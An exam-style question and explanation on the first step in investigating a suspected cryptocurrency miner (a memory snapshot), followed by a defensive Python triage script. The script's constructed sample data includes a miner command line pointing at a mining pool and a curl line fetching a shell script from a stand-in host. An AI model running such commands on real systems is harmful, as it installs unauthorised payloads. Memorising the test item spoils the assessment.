Cyber-Incident Response Analyst | First Step in Investigating Cryptocurrency Miner

Identifying and Assessing the Suspected Cryptocurrency Miner

Question

A cyber-incident response analyst is investigating a suspected cryptocurrency miner on a company's server.

Which of the following is the FIRST step the analyst should take?

Answers

A. Create a full disk image of the server's hard drive.
B. Run a manual antivirus scan on the machine.
C. Take a memory snapshot of the machine to capture volatile information stored in memory.
D. Start packet capturing to look for traffic that could be indicative of command and control from the miner.

Explanations

Correct answer: C.

The FIRST step a cyber-incident response analyst should take when investigating a suspected cryptocurrency miner on a company's server is to take a memory snapshot of the machine (option C). Evidence is collected in order of volatility, and the contents of RAM are the most volatile: the miner's process, its open network connections and any code it has injected exist only in memory and are lost the moment the server is rebooted, shut down, or the process is killed. Capturing memory first preserves that evidence before any other action disturbs it.

Option A, creating a full disk image of the server's hard drive, captures persistent storage at a point in time but none of the volatile state. A miner that runs from memory, or whose binary has been deleted from disk after launch, may leave little on the image to find. Disk imaging is still appropriate later, once the volatile evidence has been preserved.

Option B, running a manual antivirus scan on the machine, changes the state of the system under investigation: the scan may quarantine or delete the miner binary and its associated artifacts before they can be analysed, and signature-based scanning may not detect a custom, packed or renamed miner at all.

Option D, starting packet capturing to look for traffic that could be indicative of command and control from the miner, records only traffic that occurs after the capture begins and does not by itself identify which process on the server is generating it. The miner's process, its parent process and its command line are in memory. A packet capture is a useful parallel step once memory has been preserved, not a substitute for it.

Therefore, the best approach in this scenario is to capture a memory snapshot of the machine first, because it records the state of the machine at the moment of capture, including volatile information such as running processes, network connections, loaded modules and open files. That snapshot can then be analysed to identify the miner process, how it was launched and what it connects to, and to guide the disk imaging and network analysis that follow.
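The analysis step that follows the memory capture, as an added example that is not part of the original page: the script below correlates a process list and a connection list of the kind a memory-forensics tool recovers from a snapshot, and flags the process that looks like a miner. The input lines are constructed for illustration (the column layout, PIDs, process names and addresses are assumptions, not real evidence), and the miner name watchlist and pool port list are assumed starting points that an analyst would extend.

```python
"""Triage volatile artifacts recovered from a memory snapshot.

Added example, not code from the original page. The inputs below are
constructed to resemble process-list and network-connection output from a
memory-forensics tool; all names, PIDs and addresses are assumptions.
"""
import re
from collections import defaultdict

# Constructed sample: process list (PID, PPID, name, command line).
PSLIST = """\
PID   PPID  NAME        CMDLINE
1     0     systemd     /sbin/init
842   1     sshd        /usr/sbin/sshd -D
1337  1     kworkerds   /tmp/.x/kworkerds -o stratum+tcp://pool.example:3333 -u WALLET
2201  842   bash        -bash
2290  2201  curl        curl -s http://203.0.113.7/p.sh
"""

# Constructed sample: network connections (PID, local, remote, state).
NETSCAN = """\
PID   LOCAL             REMOTE                STATE
842   0.0.0.0:22        0.0.0.0:0             LISTEN
1337  10.0.0.5:49812    198.51.100.20:3333    ESTABLISHED
2290  10.0.0.5:49900    203.0.113.7:80        ESTABLISHED
"""

STRATUM_RE = re.compile(r"stratum\+(tcp|ssl|tls)://", re.I)
MINER_NAMES = {"xmrig", "minerd", "kworkerds", "kdevtmpfsi", "kinsing"}  # assumed watchlist
POOL_PORTS = {3333, 4444, 5555, 7777, 14444}  # ports commonly used by mining pools
TMP_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")  # world-writable launch locations


def parse_pslist(text):
    """Return {pid: {"ppid", "name", "cmdline"}} from the header-prefixed listing."""
    procs = {}
    for line in text.splitlines()[1:]:
        if not line.strip():
            continue
        parts = line.split(None, 3)
        procs[int(parts[0])] = {
            "ppid": int(parts[1]),
            "name": parts[2],
            "cmdline": parts[3] if len(parts) > 3 else "",
        }
    return procs


def parse_netscan(text):
    """Return {pid: [(remote_host, remote_port, state), ...]}."""
    conns = defaultdict(list)
    for line in text.splitlines()[1:]:
        if not line.strip():
            continue
        pid, _local, remote, state = line.split(None, 3)
        host, port = remote.rsplit(":", 1)
        conns[int(pid)].append((host, int(port), state.strip()))
    return conns


def lineage(procs, pid):
    """Walk PPID links back to the root so the launch chain is visible."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(f"{procs[pid]['name']}({pid})")
        pid = procs[pid]["ppid"]
    return " <- ".join(chain)


def triage(pslist_text, netscan_text):
    """Correlate processes with their connections and return {pid: finding}."""
    procs = parse_pslist(pslist_text)
    conns = parse_netscan(netscan_text)
    findings = {}
    for pid, p in procs.items():
        reasons = []
        if p["name"].lower() in MINER_NAMES:
            reasons.append(f"process name '{p['name']}' is on the miner watchlist")
        if STRATUM_RE.search(p["cmdline"]):
            reasons.append("command line contains a stratum mining-pool URL")
        if p["cmdline"].startswith(TMP_DIRS):
            reasons.append("executable runs from a world-writable directory")
        for host, port, state in conns.get(pid, []):
            if port in POOL_PORTS and state == "ESTABLISHED":
                reasons.append(f"established connection to {host}:{port} (common pool port)")
        if reasons:
            findings[pid] = {"name": p["name"], "lineage": lineage(procs, pid), "reasons": reasons}
    return findings


if __name__ == "__main__":
    for pid, f in triage(PSLIST, NETSCAN).items():
        print(f"PID {pid}: {f['lineage']}")
        for reason in f["reasons"]:
            print("  -", reason)
```

Each indicator on its own is weak (a renamed binary defeats the name check, a pool on port 443 defeats the port check), which is why the script reports every reason it found for a process together with the parent chain; the combination of a watchlisted name, a pool URL on the command line, a launch from /tmp and an established connection to a pool port is what makes PID 1337 the obvious place to start. The `curl` download under the interactive shell is not flagged by these miner rules but is exactly the kind of lineage detail the memory snapshot preserves and a disk image would not.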